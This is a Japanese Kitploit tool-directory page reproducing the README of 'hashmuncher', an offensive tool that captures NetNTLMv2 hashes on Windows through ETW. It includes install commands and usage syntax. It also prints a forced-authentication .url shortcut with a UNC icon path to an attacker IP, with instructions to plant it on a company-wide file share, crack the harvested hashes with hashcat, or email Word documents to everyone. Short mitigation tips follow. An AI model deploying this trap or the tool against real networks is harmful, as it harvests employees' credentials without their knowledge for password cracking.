Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
hashmuncher — Windows 8.1 / Windows Server 2016以降において、管理者権限でETWを使用してNetNTLMv2ハッシュを取得します。 | Kitploit
ツール/GitHubGitHub/lkarlslund/hashmuncher
パケットスニッフィングと分析パスワード攻撃ハッシュ分析情報収集ペネトレーションテストレッドチーミング
GitHublkarlslund/hashmuncher

hashmuncher

Windows 8.1 / Windows Server 2016以降において、管理者権限でETWを使用してNetNTLMv2ハッシュを取得します。

リポジトリを見る
126763年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Hash Muncher

Windows 上で管理者権限を使用して、ETW を使って NetNTLMv2 ハッシュを取得する

GitHub all releases GitHub Workflow Status

  • Windows 8.1 / Windows 2016 以降では、昇格された(管理者)アクセスが必要です
  • SMB 認証パケットの生パケットデータにアクセスするために、Event Tracing for Windows(ETW)を使用します
  • NTLM メッセージタイプ 2 と 3 をデコードします
  • stdout またはファイルに出力します
  • Ctrl-C を押して処理を停止するか、timeout オプションを使用します
  • HashCat で -m 5600 を使用してハッシュをクラックします

Hash Muncher の入手

これをセットアップして実行するには、3 つの異なるオプションがあります。

A) 自動ビルドされたバイナリを リリース からダウンロードする

B) 次の Go コマンドを使用して Windows でビルドおよびインストールする

  • Golang が必要です
root@kitploit:~
go install github.com/lkarlslund/hashmuncher@latest

C) PowerShell がインストールされている、Golang がサポートする任意のプラットフォームで Windows バイナリをクロスコンパイルする

  • Golang と PowerShell が必要です
root@kitploit:~
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1

使用方法

  1. Windows ファイアウォールで「ファイルとプリンターの共有」が許可されていることを確認してください。Hash Muncher は、組み込みの SMB サービスが最初の要求を受信し、ターゲットに応答パケットを送信する必要があるためです。

  2. 昇格されたプロンプトで Hash Muncher を実行します

root@kitploit:~
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
  1. 次に、誰かがあなたのマシンに対して認証するのを待つか、以下のように、一般的な共有ファイルサーバーに URL ショートカットを仕掛けます。
root@kitploit:~
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1

IP アドレスをあなたの Hash Muncher マシンの IP アドレスに置き換え、ファイルを(会社全体の)ファイル共有に 'whatever.url' として保存すると、ハッシュが次々と送られてくるのがわかります。

その他の方法は Red Team Notes - Forced Authentication に記載されています。全員に Word 文書をメールで送ってもおそらく成功するでしょうが、それはまったくステルス性がありません。

検出

  • 私が見た限りでは存在しませんが、フィードバックをお寄せください

緩和策

  • ETW 部分に対する緩和策はありません。Microsoft によれば、これは Windows の設計の一部です
  • 強力なパスワードを使用してください! NetNTLMv2 のクラックは決して速くありませんが、弱いパスワードなら確実に実行できます
  • NTLM を完全に無効にしてください! おそらく無痛ではないでしょう。ただし、Farewell NTLM - It is time to disable NTLM を参照してください

履歴

私は ETW を断続的に試してきましたが、Nettitude Labs の非常にクールな 研究 を見たとき、これを私の好きな言語である Golang で使いやすいツールにしなければならないと確信しました! Nettitude Labs は .Net フレームワークで動作する C# で書かれた実用的な POC を持っており、そちらの方があなたにとってはより良い選択肢かもしれません。ですから、私はここで何かを発明しているわけではなく、単に代替手段としてこれを追加しているだけです。

Windows セキュリティ関連が好きなら、私の攻撃グラフツール Adalanche も気に入るかもしれません。

ツールをダウンロード